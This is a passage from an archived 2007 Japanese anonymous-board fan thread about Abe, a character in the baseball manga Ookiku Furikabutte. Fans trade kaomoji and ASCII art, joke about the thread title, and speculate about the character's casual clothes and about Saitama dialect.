・・・阿部が↑言ってると思ったらちょっと面白かったわ…
1巻のまだ猫かぶってた頃の表情で阿部がな…

138 :名無しかわいいよ名無し:2007/11/29(木) 15:44:05 ID:t7WfI0iL
なんか知らんが阿部の敬語が好きだ

139 :名無しかわいいよ名無し:2007/11/29(木) 16:13:23 ID:d+RZM1Ez
>>137
所謂お約束

140 :名無しかわいいよ名無し:2007/11/29(木) 16:36:55 ID:NiwI8KUn
みんな情報ありがとう
特典つきなんて全然知らなかった!
さっそくDVD買ってきたよ

141 :名無しかわいいよ名無し:2007/11/29(木) 19:33:41 ID:UhaMYx72
栄口は阿部の猫かぶりを見ながら何を思ったか
あの時点じゃそんなでもないかな

142 :名無しかわいいよ名無し:2007/11/29(木) 23:17:35 ID:WJgwuttU
埼玉のほうって方言あるの?

143 :名無しかわいいよ名無し:2007/11/30(金) 07:46:01 ID:DWGzopVM
ないと思うけど
微妙にあるっぽい

144 :名無しかわいいよ名無し:2007/11/30(金) 07:54:18 ID:82YvVNJE
方言がない地域はない

145 :名無しかわいいよ名無し:2007/11/30(金) 15:36:24 ID:WKGqm9p1
んな事ねえっぺ!

146 :名無しかわいいよ名無し:2007/11/30(金) 16:07:35 ID:yS8pAU+Y
東京も江戸弁あるしな〜標準語は虚構の世界の言葉なのね

147 :名無しかわいいよ名無し:2007/11/30(金) 18:16:28 ID:lM/2l80+
江戸弁って「てやんでぇ!」ってやつか?

148 :名無しかわいいよ名無し:2007/11/30(金) 19:16:18 ID:U53lV37c
「ちょいとそこまで」とか「なんてったって」とか

149 :名無しかわいいよ名無し:2007/11/30(金) 19:17:32 ID:SYCK2GEv
DVD届いた!
千代ちゃんと手繋いでたところ
修正されちゃったんだねー残念

150 :名無しかわいいよ名無し:2007/11/30(金) 19:21:09 ID:+WwOMRAv
検定開始

151 :名無しかわいいよ名無し:2007/11/30(金) 19:39:14 ID:YjqF87bg
埼玉は方言ありまくりです
仮に東京が標準語と考えても

152 :名無しかわいいよ名無し:2007/11/30(金) 19:53:15 ID:SYCK2GEv
埼玉県民のイントネーションは面白い

153 :名無しかわいいよ名無し:2007/11/30(金) 20:12:33 ID:DWGzopVM
>>148
それ標準語かと思てた\(^o^)/

154 :名無しかわいいよ名無し:2007/11/30(金) 20:47:53 ID:RBldQaR+
>>145
それクソワロタww

155 :名無しかわいいよ名無し:2007/12/01(土) 08:02:04 ID:qnlgXcnx
アベる:仕事や責任を放棄してしまうこと


現代用語の基礎知識 2008

156 :名無しかわいいよ名無し:2007/12/01(土) 08:31:12 ID:U4ZFGm3o
(个ω个)

157 :名無しかわいいよ名無し:2007/12/01(土) 10:31:27 ID:E0MjP7X1
>>149
えっそんなんあったっけか?

158 :名無しかわいいよ名無し:2007/12/01(土) 10:37:44 ID:4VcPXSv6
>>157
自演乙

159 :名無しかわいいよ名無し:2007/12/01(土) 11:39:59 ID:O4v5uN+q
>>156

(*゚◇゚)<あ!・・・べく・・・ん?

160 :名無しかわいいよ名無し:2007/12/01(土) 13:32:54 ID:pl4IEprG
(个ω个)(仝ω仝)

161 :名無しかわいいよ名無し:2007/12/01(土) 13:55:44 ID:mRkzPwi/
(个ω个)(仝ω仝)(仝)ω(仝)

162 :名無しかわいいよ名無し:2007/12/01(土) 15:12:27 ID:O4v5uN+q

     グシュ
(;Ω◇Ω)<ご・・・ごめんなさい

163 :名無しかわいいよ名無し:2007/12/01(土) 16:40:10 ID:fm9Jh1fC
阿部家増殖…

164 :名無しかわいいよ名無し:2007/12/01(土) 16:46:47 ID:zj6Hl/FX
なんという阿部家

165 :名無しかわいいよ名無し:2007/12/01(土) 17:46:36 ID:E0MjP7X1
>>158
自演じゃないよ…149が荒らしってことか
スマン気づかなかった

166 :名無しかわいいよ名無し:2007/12/01(土) 17:59:00 ID:fm9Jh1fC
ところでここのスレタイ
アベるなじゃなくてアペるな(゛じゃなくて゜)なのは既出?
狙ってやったのか

167 :名無しかわいいよ名無し:2007/12/01(土) 18:08:52 ID:1s7Bi0w/
>>166
> 927 名前:名無しかわいいよ名無し[sage] 投稿日:2007/11/16(金) 18:52:57 ID:qZQhiXMw
> 辞書検索したらgo apeで「(突然)カッとなる」とあってフイタ
> ABEは怒るとAPEに変化するんだね

前スレのこれから
アペじゃなくエイプだけどな

168 :名無しかわいいよ名無し:2007/12/01(土) 18:43:59 ID:4VcPXSv6
>>166
前スレくらい読んどいで

169 :名無しかわいいよ名無し:2007/12/01(土) 18:59:36 ID:TTA+GTg5
え、元々はIDだよね?
もうちょっとでabeだったのにって。


170 :名無しかわいいよ名無し:2007/12/01(土) 20:04:56 ID:zj6Hl/FX
その前にも何回か一文字違いの惜しいIDが出てて、アペが出てから>>169
(今度はアペかー)という流れになって、ほんで>>167(辞書ひいてみた人)が出てきて、
じゃああのカーッて怒る状態がアペるなんだなーで終了だったと思うけど
これでいいのかな?

171 :名無しかわいいよ名無し:2007/12/01(土) 20:16:46 ID:41dbHMWV
そう。それで アペるって言った人がいてそれをこのスレ立てた人が拾ってくれたんだ。

172 :名無しかわいいよ名無し:2007/12/01(土) 22:41:35 ID:JsAbdH+Z
エイプって読むんだったのかwww

173 :名無しかわいいよ名無し:2007/12/02(日) 09:57:20 ID:kjMbbDtZ
阿部
状態:エイプ

174 :名無しかわいいよ名無し:2007/12/02(日) 22:38:09 ID:l3NoxOgV
(仝ω仝)<過疎ってるなあ…


(个ω个)<半日以上書き込みなかったね

175 :名無しかわいいよ名無し:2007/12/02(日) 23:18:07 ID:Oi8Givdm
ごめんよ・・・阿部ブラザーズ・・・

176 :名無しかわいいよ名無し:2007/12/02(日) 23:32:15 ID:a19veCKc
(仝ω仝)<阿部すげえな!
     捕手なのにバッティングでチョー役立ってたな!

177 :名無しかわいいよ名無し:2007/12/03(月) 00:02:29 ID:W293K/Ow
阿部慎はとんでもない長打力だなー

阿部は阿部なりに頑張ってほしい

178 :名無しかわいいよ名無し:2007/12/03(月) 02:32:21 ID:sZkJN+jo
                                ハ,,ハ
                (仝ω仝)          (゚◇゚*)
               /    \         /    \
            ((⊂  )   ノ\つ))    ((⊂/ヽ  (  つ))
               (_⌒ヽ           /⌒_)
               ヽ ヘ }          { ∧ /
                ノノ `J          し´ ヽ(


            ┬
           (⌒)                           ハ,,ハ
      ( 仝ω) ,っつ                         (゚◇゚*)
     /     ∨/                           /    \
  ((⊂  )   ノ\/                 ─────(|⊂/ヽ  (  つ))
     (_⌒ヽ                             /⌒_)
     ヽ ヘ }                             { ∧ /
      ノノ `J                             し´ ヽ(




                  ─────(|━ ヾ

                              \\\
            ┬
           (⌒)                     ⊂\   ハ,,ハ
    Σ( 仝д) ,っつ                       \\(゚◇゚*)
     /     ∨/                           \    \
  ((⊂  )   ノ\/                            ヽ  (  つ))
     (_⌒ヽ                             /⌒_)
     ヽ ヘ }                             { ∧ /
      ノノ `J                             し´ ヽ(


       __||__
       .`┬´
        │    ┬
        │   (⌒)                     ⊂\   ハ,,ハ
      (仝д仝),っつ                       \\(*゚◇゚*)
     /     ∨/                           \    \
  ((⊂  )   ノ\/                            ヽ  (  つ))
     (_⌒ヽ                             /⌒_)
     ヽ ヘ }                             { ∧ /
      ノノ `J                             し´ ヽ(

179 :名無しかわいいよ名無し:2007/12/03(月) 04:58:08 ID:ZmiTH9fS
何故急にヒゲダンスw
でもなんか等身気持ち悪いよ

180 :名無しかわいいよ名無し:2007/12/03(月) 08:58:25 ID:zWj1sN5I
ちょw三橋はひどい奴だよ

181 :名無しかわいいよ名無し:2007/12/03(月) 11:05:29 ID:ckmkz4e2
ナイスコントロール!

182 :名無しかわいいよ名無し:2007/12/03(月) 16:53:51 ID:030axjgj
阿部の私服ってどんなんかな〜
私服がめんどうとか言ってるあたりあんまこだわらんのかね

183 :名無しかわいいよ名無し:2007/12/03(月) 17:26:08 ID:K8oxRCE+
どっかでみたことあるなーと思ったらヒゲダンスかw

>>182
前もそういう話題でたけど、
阿部は自分では全くといっていいほど関心なさそう
でも母がそれなりに気を使って揃えてくれたりしてるんじゃないか、
という感じに落ち着くんだよね

184 :名無しかわいいよ名無し:2007/12/03(月) 19:45:04 ID:KVJ8hFFH
母ちゃんに買わせたら全身真っ黒だろうなw

185 :名無しかわいいよ名無し:2007/12/03(月) 20:40:05 ID:YxOBqe4V
ミットが黒なのは母親の影響だったりしてw
阿部ってさ、ミットはマイミットだろうけど、防具とかは学校のなのかね?

186 :名無しかわいいよ名無し:2007/12/03(月) 21:27:55 ID:HLrOaknb
阿部は基本的にジャージでいるんじゃないか?と予想。

187 :名無しかわいいよ名無し:2007/12/03(月) 21:39:03 ID:20y1sLvQ
>>185
その辺気になるね。ずっと捕手やってたなら防具一式全部
揃えてそうな気がする

>>186
家ではTシャツとジャージがデフォって感じがする
プーマとかナイキとか好きそう

188 :名無しかわいいよ名無し:2007/12/03(月) 21:59:20 ID:q2UXeOa4
変にオサレな阿部は想像できないなぁ

189 :名無しかわいいよ名無し:2007/12/03(月) 22:34:28 ID:ckmkz4e2
合宿のときは微妙だったよなぁ…
阿部はフツメン〜イケメンレベルではあるんだが典型的「制服は似合う顔」なんだよなあ
時々いるよね、普段はかっこいいと言われてるのに学年旅行とかで私服で来ると2割減になる人
以前冬のアウターなにが似合うだろうと色々コラして見たがどれも似合わず驚いたぜ…
三橋はトレンチダッフルなんでも似合うのに

まあメンノンとかBIDAN買ってる阿部も嫌だがな

190 :名無しかわいいよ名無し:2007/12/03(月) 22:37:19 ID:UYBO1Wls
ジーンズメイト着てる阿部が容易に想像できる

191 :名無しかわいいよ名無し:2007/12/03(月) 23:12:03 ID:030axjgj
確かにばりばりお洒落なのは想像つかないw
カレンダーのやつも割と普通だったし

でも西浦で1番プーマが似合うのは阿部だとおもうんだ

192 :名無しかわいいよ名無し:2007/12/03(月) 23:30:54 ID:jY8FdYsv
>>178
ちょっ久し振りに阿部スレきたらフイタwww
三橋のコントロールは半端ないなw

阿部の冬服はまあ普通なかんじだろうなー
でも手袋だけはミトンはめとったらいいなぁ
シュンはふかふかのイヤーマフとかしてたらいいよ

193 :名無しかわいいよ名無し:2007/12/04(火) 08:12:23 ID:lxSCTEh6
>>165
>>149なんだけどこれ書いたら荒らしになるの?

194 :名無しかわいいよ名無し:2007/12/04(火) 08:53:22 ID:acZETOPB
今まで出た阿部の私服っていうと、三橋の家でカレー食った時のTシャツ位か?
あれPUMAだったな。 やっぱそういうメーカーのを着てるのかなw 

195 :名無しかわいいよ名無し:2007/12/04(火) 11:00:58 ID:yo/qC8Qt
球技大会(?)のときだよね。<プーマ
変におしゃれな阿部はおかしいから、ちょいダサくらいでいいよ

196 :名無しかわいいよ名無し:2007/12/04(火) 11:01:18 ID:h6K5ybd+
>>189
まじか…
合宿の時の服かなり好きなんだがもしや少数派?

197 :名無しかわいいよ名無し:2007/12/04(火) 11:55:10 ID:sZ9y8UeC
自分も好きだよ。
襟が開いてる服着てんの珍しかったし。
阿部はお洒落はしないがモノトーンの当たり外れ少ない無難な服着てそうなイメージ。
地味ではあるが変に気合い入れすぎた服着てる人に比べたらかえってマシな感じの

198 :名無しかわいいよ名無し:2007/12/04(火) 12:15:51 ID:yo/qC8Qt
なんかいろいろ想像したら萌えてきた
阿部の私服がゲンミツにみたい

199 :名無しかわいいよ名無し:2007/12/04(火) 12:18:50 ID:uj/z0K4R
(仝ω仝)
この顔文字いまいち理解できん。
エ  エの上は眉毛なの?髪?
それに阿部の口がωなのも違和感がある。

200 :名無しかわいいよ名無し:2007/12/04(火) 12:36:39 ID:yo/qC8Qt
前スレより

(仝ω仝) (仝凵W) (仝_仝) (仝。仝) (仝Δ仝) (仝ι仝) (仝∀仝)
(仝_仝) (仝ヘ仝) (仝p仝) (仝ψ仝)
口なし (仝 仝)
呆れ顔1(仝д仝)
呆れ顔2(仝△仝)
への字(仝ヘ仝)
笑顔1(仝ー仝)
笑顔2(仝ワ仝)
笑顔3(仝∀仝)
笑顔4(仝ヮ仝)

私は(仝言仝) がお気に入り

201 :名無しかわいいよ名無し:2007/12/04(火) 13:38:38 ID:ZFZvkax9
(仝言仝)はずっと見てるといいなw
ちびまるこちゃん的な

202 :名無しかわいいよ名無し:2007/12/04(火) 15:16:36 ID:acZETOPB
俺も(仝言仝)結構好きw
顔目の前に持ってこられてスゲエ低い声で凄まれてる感じで

203 :名無しかわいいよ名無し:2007/12/04(火) 15:17:06 ID:uj/z0K4R
言の一番下が口か

45 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)